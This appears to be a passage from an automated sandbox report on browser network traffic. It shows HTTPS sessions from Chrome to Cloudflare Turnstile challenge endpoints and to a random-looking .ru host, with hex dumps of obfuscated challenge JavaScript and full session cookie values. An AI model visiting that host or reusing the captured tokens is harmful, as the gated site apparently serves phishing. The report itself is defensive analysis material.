                                                                                                        Data Ascii: G<H},'qYpIW':function(G,H){return G+H},'zgumW':function(G,H,I,J){return G(H,I,J)},'BcHoK':function(G,H){return H===G},'twFHN':i3(1457),'COonu':i3(1144)},null===h||void 0===h)return j;for(x=fw(h),g[i3(1363)][i3(1152)]&&(x=x[i3(1534)](g[i3(1363)][i3(1152)]
                                                                                                        2024-12-18 22:16:54 UTC1369INData Raw: 29 5d 28 69 5b 69 37 28 31 38 31 38 29 5d 28 27 6f 2e 27 2c 68 5b 6a 5b 6b 5d 5d 5b 6d 5d 29 29 29 2c 6d 2b 2b 29 3b 7d 65 6c 73 65 20 67 5b 6c 5d 3d 68 5b 6a 5b 6b 5d 5d 5b 69 37 28 31 35 34 32 29 5d 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 27 6f 2e 27 2b 6e 7d 29 7d 2c 66 7a 3d 66 75 6e 63 74 69 6f 6e 28 69 38 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 69 38 3d 67 4a 2c 64 3d 7b 27 62 69 63 4e 78 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 44 44 4f 65 58 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 62 72 78 6d 41 27 3a 69 38 28 37 34 32 29 2c 27 4d 73 73 67 52 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 2c 6a 29 7b 72 65 74 75 72 6e 20 68 28 69
                                                                                                        Data Ascii: )](i[i7(1818)]('o.',h[j[k]][m]))),m++);}else g[l]=h[j[k]][i7(1542)](function(n){return'o.'+n})},fz=function(i8,d,e,f,g){return i8=gJ,d={'bicNx':function(h,i){return h==i},'DDOeX':function(h,i){return h+i},'brxmA':i8(742),'MssgR':function(h,i,j){return h(i
                                                                                                        2024-12-18 22:16:54 UTC1369INData Raw: 6e 20 69 2a 68 7d 2c 27 67 6c 50 78 54 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 4b 71 6b 6f 42 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 47 4b 4c 54 63 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 49 6f 6f 42 67 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 66 66 48 6b 50 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 69 56 48 47 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 41 6d 55 78 73 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 7d 2c 65 3d 53 74 72
                                                                                                        Data Ascii: n i*h},'glPxT':function(h,i){return h&i},'KqkoB':function(h,i){return h(i)},'GKLTc':function(h,i){return i==h},'IooBg':function(h,i){return h(i)},'ffHkP':function(h,i){return h-i},'iVHGm':function(h,i){return i==h},'AmUxs':function(h,i){return h+i}},e=Str
                                                                                                        2024-12-18 22:16:54 UTC1369INData Raw: 5d 28 64 5b 69 62 28 31 30 38 36 29 5d 28 73 2c 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3d 30 2c 43 2b 2b 29 3b 66 6f 72 28 50 3d 46 5b 69 62 28 39 32 37 29 5d 28 30 29 2c 43 3d 30 3b 64 5b 69 62 28 31 31 31 33 29 5d 28 31 36 2c 43 29 3b 4b 3d 64 5b 69 62 28 39 33 32 29 5d 28 4b 2c 31 29 7c 64 5b 69 62 28 31 37 37 32 29 5d 28 50 2c 31 29 2c 64 5b 69 62 28 31 31 35 39 29 5d 28 4c 2c 64 5b 69 62 28 31 32 32 38 29 5d 28 6f 2c 31 29 29 3f 28 4c 3d 30 2c 4a 5b 69 62 28 37 39 37 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3e 3e 3d 31 2c 43 2b 2b 29 3b 7d 47 2d 2d 2c 47 3d 3d 30 26 26 28 47 3d 4d 61 74 68 5b 69 62 28 31 35 39 30 29 5d 28 32 2c 49 29 2c 49 2b 2b 29 2c 64 65 6c 65 74 65 20 45 5b 46 5d 7d 65 6c 73 65 20 66 6f 72 28 50 3d 44 5b 46 5d
                                                                                                        Data Ascii: ](d[ib(1086)](s,K)),K=0):L++,P=0,C++);for(P=F[ib(927)](0),C=0;d[ib(1113)](16,C);K=d[ib(932)](K,1)|d[ib(1772)](P,1),d[ib(1159)](L,d[ib(1228)](o,1))?(L=0,J[ib(797)](s(K)),K=0):L++,P>>=1,C++);}G--,G==0&&(G=Math[ib(1590)](2,I),I++),delete E[F]}else for(P=D[F]
                                                                                                        2024-12-18 22:16:54 UTC1369INData Raw: 2d 2d 2c 47 3d 3d 30 26 26 49 2b 2b 7d 66 6f 72 28 50 3d 32 2c 43 3d 30 3b 43 3c 49 3b 4b 3d 64 5b 69 62 28 39 33 32 29 5d 28 4b 2c 31 29 7c 50 26 31 2c 64 5b 69 62 28 31 34 31 30 29 5d 28 4c 2c 64 5b 69 62 28 31 38 36 36 29 5d 28 6f 2c 31 29 29 3f 28 4c 3d 30 2c 4a 5b 69 62 28 37 39 37 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3e 3e 3d 31 2c 43 2b 2b 29 3b 66 6f 72 28 3b 3b 29 69 66 28 4b 3c 3c 3d 31 2c 6f 2d 31 3d 3d 4c 29 7b 69 66 28 64 5b 69 62 28 37 38 33 29 5d 21 3d 3d 69 62 28 31 31 32 32 29 29 7b 69 66 28 73 29 72 65 74 75 72 6e 3b 4e 3d 21 21 5b 5d 2c 47 5b 69 62 28 37 35 30 29 5d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 44 2b 2b 2c 45 28 46 2c 47 2c 48 2b 31 29 7d 2c 42 5b 69 62 28 37 30 38 29 5d 28 32 35 30 2c 42 5b 69 62 28 31 37 30
                                                                                                        Data Ascii: --,G==0&&I++}for(P=2,C=0;C<I;K=d[ib(932)](K,1)|P&1,d[ib(1410)](L,d[ib(1866)](o,1))?(L=0,J[ib(797)](s(K)),K=0):L++,P>>=1,C++);for(;;)if(K<<=1,o-1==L){if(d[ib(783)]!==ib(1122)){if(s)return;N=!![],G[ib(750)](function(){D++,E(F,G,H+1)},B[ib(708)](250,B[ib(170
                                                                                                        2024-12-18 22:16:54 UTC1369INData Raw: 21 3d 46 3b 4c 3d 47 26 48 2c 48 3e 3e 3d 31 2c 64 5b 69 68 28 31 35 33 36 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 69 68 28 31 31 38 35 29 5d 28 30 3c 4c 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 4d 3d 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 69 68 28 31 35 39 30 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 46 21 3d 4b 3b 4c 3d 64 5b 69 68 28 37 31 30 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 64 5b 69 68 28 37 39 30 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 28 30 3c 4c 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 64 5b 69 68 28 38 36 32 29 5d 28 65 2c 4a 29 2c 4d 3d 42 2d 31 2c 78 2d 2d 3b 62 72 65 61
                                                                                                        Data Ascii: !=F;L=G&H,H>>=1,d[ih(1536)](0,H)&&(H=j,G=o(I++)),J|=d[ih(1185)](0<L?1:0,F),F<<=1);switch(M=J){case 0:for(J=0,K=Math[ih(1590)](2,8),F=1;F!=K;L=d[ih(710)](G,H),H>>=1,d[ih(790)](0,H)&&(H=j,G=o(I++)),J|=(0<L?1:0)*F,F<<=1);s[B++]=d[ih(862)](e,J),M=B-1,x--;brea
                                                                                                        2024-12-18 22:16:54 UTC1369INData Raw: 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 46 3d 3d 3d 45 7d 2c 27 66 70 49 67 65 27 3a 69 6b 28 31 35 34 38 29 2c 27 6d 55 45 4f 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 2c 47 29 7b 72 65 74 75 72 6e 20 45 28 46 2c 47 29 7d 2c 27 63 67 6c 42 69 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 7c 7c 46 7d 2c 27 6c 76 5a 59 6f 27 3a 69 6b 28 31 36 38 34 29 2c 27 4b 4d 53 75 42 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 2b 46 7d 2c 27 78 69 43 48 6b 27 3a 69 6b 28 31 39 30 31 29 2c 27 51 6d 4d 42 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 2b 46 7d 7d 29 3b 74 72 79 7b 69 66 28 69 5b 69 6b 28 35 30 30 29 5d 28 69 6b 28 31 35 37 36 29 2c 69 5b 69 6b 28 36 39 34 29 5d 29
                                                                                                        Data Ascii: on(E,F){return F===E},'fpIge':ik(1548),'mUEOJ':function(E,F,G){return E(F,G)},'cglBi':function(E,F){return E||F},'lvZYo':ik(1684),'KMSuB':function(E,F){return E+F},'xiCHk':ik(1901),'QmMBM':function(E,F){return E+F}});try{if(i[ik(500)](ik(1576),i[ik(694)])


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        14192.168.2.449760104.18.95.414432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:16:54 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: image
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/vah5h/0x4AAAAAAA0rzW9AeLMV2SZQ/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:16:54 UTC240INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 22:16:54 GMT
                                                                                                        Content-Type: image/png
                                                                                                        Content-Length: 61
                                                                                                        Connection: close
                                                                                                        cache-control: max-age=2629800, public
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f42851e1850c445-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-12-18 22:16:54 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        15192.168.2.449746104.21.78.1814432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:16:55 UTC1323OUTGET /favicon.ico HTTP/1.1
                                                                                                        Host: d7m.kczcylvjubu.ru
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: image
                                                                                                        Referer: https://d7m.kczcylvjubu.ru/xJEob3V/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Cookie: XSRF-TOKEN=eyJpdiI6IldUWG80MS9TS0w2NytNZytpRWhhY3c9PSIsInZhbHVlIjoicVJYNFZWMmkydnUrZ0FMcEF2cGJTZmlsaFl3ZmRsVUdjaUhNZU5zVWFVeG1FZTZiYUxIaG9ZekdHdjNSb0oybWZicll0ODlRWkNMSnRZd1N6ZlBuOCtHemlEUzM1bUh5VzlHdk5FSEFYQjREOS9zZXVmK014OFNyNTVDOWJ0YXoiLCJtYWMiOiIyODgxYTM3Zjk5NGU1NjBlZmFiODFmNWNiOTcwNzMxZmY5MzEwZWFiZGM3NTAxMzQyMTg2ZmRlNGMzNWM3NjEzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhWbEVUTFhaWk5xUHc0Mkt3L29zVmc9PSIsInZhbHVlIjoiTlJTbVR5ZmVCeWZwbHByd3JEaGdZU20yNTZqbXlNeVlnR2c5UlZQMkFONUUxaUUrR2NSY250SUJrVnEwai9ZZFRlZzZIN1A5M3dWV216VFJ4R0I2cXlMb0VST3FHS1M0T0ZiY3BFR1Vnd2hlbTdUYms3S2ozREZLQTg1aVBRTHoiLCJtYWMiOiI1MDM5MzkzYjAzMWQzYTNhODY4MTQxY2ZkODE5YWFmODljMzJmNGUyYTIyMjdlMDRjYWViODM4NDM5MmU5MzUwIiwidGFnIjoiIn0%3D
                                                                                                        2024-12-18 22:16:55 UTC1067INHTTP/1.1 404 Not Found
                                                                                                        Date: Wed, 18 Dec 2024 22:16:55 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Cache-Control: max-age=14400
                                                                                                        Age: 4815
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MB3F5GHFjzAhajA8l0JYFrdxsEAOEt3MmpxMup5%2Bievq6zfaIrqqtP72Lb2QvwCX9hslIvT5Mwadu8SkE7kordM31A2eRp3yaKTFZcGw7IXRF2hO%2FSMRkm%2BWfLq6sA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Vary: Accept-Encoding
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4320&min_rtt=4316&rtt_var=1628&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2254&delivery_rate=653960&cwnd=243&unsent_bytes=0&cid=e70dbe91b2cb9118&ts=26&x=0"
                                                                                                        CF-Cache-Status: HIT
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f428522ade842e8-EWR
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1831&min_rtt=1829&rtt_var=690&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1901&delivery_rate=1580942&cwnd=250&unsent_bytes=0&cid=bdca26dca3f47d90&ts=9839&x=0"
                                                                                                        2024-12-18 22:16:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        16192.168.2.449764104.18.95.414432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:16:56 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:16:56 UTC240INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 22:16:56 GMT
                                                                                                        Content-Type: image/png
                                                                                                        Content-Length: 61
                                                                                                        Connection: close
                                                                                                        cache-control: max-age=2629800, public
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f4285288e37c35b-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-12-18 22:16:56 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        17192.168.2.449766104.18.95.414432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:16:56 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f4285124e7ede94&lang=auto HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:16:56 UTC331INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 22:16:56 GMT
                                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                                        Content-Length: 117313
                                                                                                        Connection: close
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f42852ada708cba-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-12-18 22:16:56 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32
                                                                                                        Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2
                                                                                                        2024-12-18 22:16:56 UTC1369INData Raw: 69 74 6c 65 22 3a 22 59 6f 75 72 25 32 30 66 65 65 64 62 61 63 6b 25 32 30 72 65 70 6f 72 74 25 32 30 68 61 73 25 32 30 62 65 65 6e 25 32 30 73 75 63 63 65 73 73 66 75 6c 6c 79 25 32 30 73 75 62 6d 69 74 74 65 64 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 74 75 63 6b 25 32 30 68 65 72 65 25 33 46 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22 50 72 69 76 61 63 79 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 22 3a 22 48 61 76 69 6e 67 25 32 30 74 72 6f 75 62 6c 65 25 33 46 22 2c 22 6f 75 74 64 61 74 65 64 5f 62 72
                                                                                                        Data Ascii: itle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","testing_only":"Testing%20only.","turnstile_overrun_description":"Stuck%20here%3F","turnstile_footer_privacy":"Privacy","turnstile_feedback_report":"Having%20trouble%3F","outdated_br
                                                                                                        2024-12-18 22:16:56 UTC1369INData Raw: 2c 66 58 2c 67 33 2c 67 34 2c 67 35 2c 67 66 2c 67 71 2c 67 75 2c 67 42 2c 65 58 2c 65 59 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 34 33 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 34 33 30 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 35 33 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 67 49 28 33 34 38 29 29 2f 34 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 34 34 39 29 29 2f 35 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 34 35 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 37 37 29 29 2f 37 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31
                                                                                                        Data Ascii: ,fX,g3,g4,g5,gf,gq,gu,gB,eX,eY){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(543))/1*(parseInt(gI(430))/2)+-parseInt(gI(953))/3+parseInt(gI(348))/4*(parseInt(gI(449))/5)+parseInt(gI(1345))/6+parseInt(gI(1477))/7*(-parseInt(gI(1
                                                                                                        2024-12-18 22:16:56 UTC1369INData Raw: 5d 29 29 3a 6f 5b 67 4e 28 34 32 36 29 5d 28 73 2c 6f 5b 67 4e 28 36 38 33 29 5d 28 69 2c 44 29 2c 45 29 2c 43 2b 2b 29 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e 63 74 69 6f 6e 20 73 28 47 2c 48 2c 67 4f 29 7b 67 4f 3d 67 4e 2c 6f 5b 67 4f 28 37 37 30 29 5d 21 3d 3d 6f 5b 67 4f 28 31 32 32 38 29 5d 3f 28 4f 62 6a 65 63 74 5b 67 4f 28 39 33 36 29 5d 5b 67 4f 28 37 33 31 29 5d 5b 67 4f 28 38 36 34 29 5d 28 6a 2c 48 29 7c 7c 28 6a 5b 48 5d 3d 5b 5d 29 2c 6a 5b 48 5d 5b 67 4f 28 31 31 32 38 29 5d 28 47 29 29 3a 78 5b 6f 5b 67 4f 28 31 37 31 29 5d 5d 5b 67 4f 28 31 30 31 34 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 67 4f 28 31 33 36 39 29 2c 27 77 69 64 67 65 74 49 64 27 3a 73 5b 67 4f 28 31 33 34 37 29 5d 5b 67 4f 28 31 31 34 33 29 5d 2c 27 66 65 65 64 62 61 63 6b
                                                                                                        Data Ascii: ])):o[gN(426)](s,o[gN(683)](i,D),E),C++);return j;function s(G,H,gO){gO=gN,o[gO(770)]!==o[gO(1228)]?(Object[gO(936)][gO(731)][gO(864)](j,H)||(j[H]=[]),j[H][gO(1128)](G)):x[o[gO(171)]][gO(1014)]({'source':gO(1369),'widgetId':s[gO(1347)][gO(1143)],'feedback
                                                                                                        2024-12-18 22:16:56 UTC1369INData Raw: 3a 61 39 2e 68 5b 6b 5b 67 52 28 36 37 36 29 5d 28 32 34 2c 61 61 2e 67 29 5d 3d 45 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 61 64 2e 68 5b 6b 5b 67 52 28 37 33 39 29 5d 28 34 38 2c 61 65 2e 67 29 5d 5b 67 52 28 34 39 33 29 5d 28 42 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 42 3d 78 5b 67 52 28 34 30 37 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 7d 65 6c 73 65 20 74 68 72 6f 77 20 45 7d 7d 65 6c 73 65 20 72 65 74 75 72 6e 20 6b 5b 67 52 28 36 36 35 29 5d 28 27 6f 2e 27 2c 73 29 7d 29 7d 2c 65 56 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 67 53 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 29 7b 66 6f 72 28 67 53 3d 67 4a 2c 66 3d 7b 27 74 4c 76 56 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2b 6d
                                                                                                        Data Ascii: :a9.h[k[gR(676)](24,aa.g)]=E;continue;case'3':ad.h[k[gR(739)](48,ae.g)][gR(493)](B);continue;case'4':B=x[gR(407)]();continue}break}}else throw E}}else return k[gR(665)]('o.',s)})},eV=function(c,gS,f,g,h,i,j,k){for(gS=gJ,f={'tLvVk':function(l,m){return l+m
                                                                                                        2024-12-18 22:16:56 UTC1369INData Raw: 20 68 28 69 29 7d 2c 27 4c 54 6d 6e 6a 27 3a 67 55 28 31 34 34 30 29 2c 27 5a 61 4e 74 59 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 70 6b 41 5a 72 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 59 69 74 57 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 5a 48 69 78 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 69 71 61 4b 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 2a 68 7d 2c 27 51 64 52 44 50 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 75 48 58 73 52 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65
                                                                                                        Data Ascii: h(i)},'LTmnj':gU(1440),'ZaNtY':function(h,i){return h!=i},'pkAZr':function(h,i){return i&h},'YitWM':function(h,i){return h(i)},'ZHixh':function(h,i){return h(i)},'iqaKN':function(h,i){return i*h},'QdRDP':function(h,i){return h>i},'uHXsR':function(h,i){re
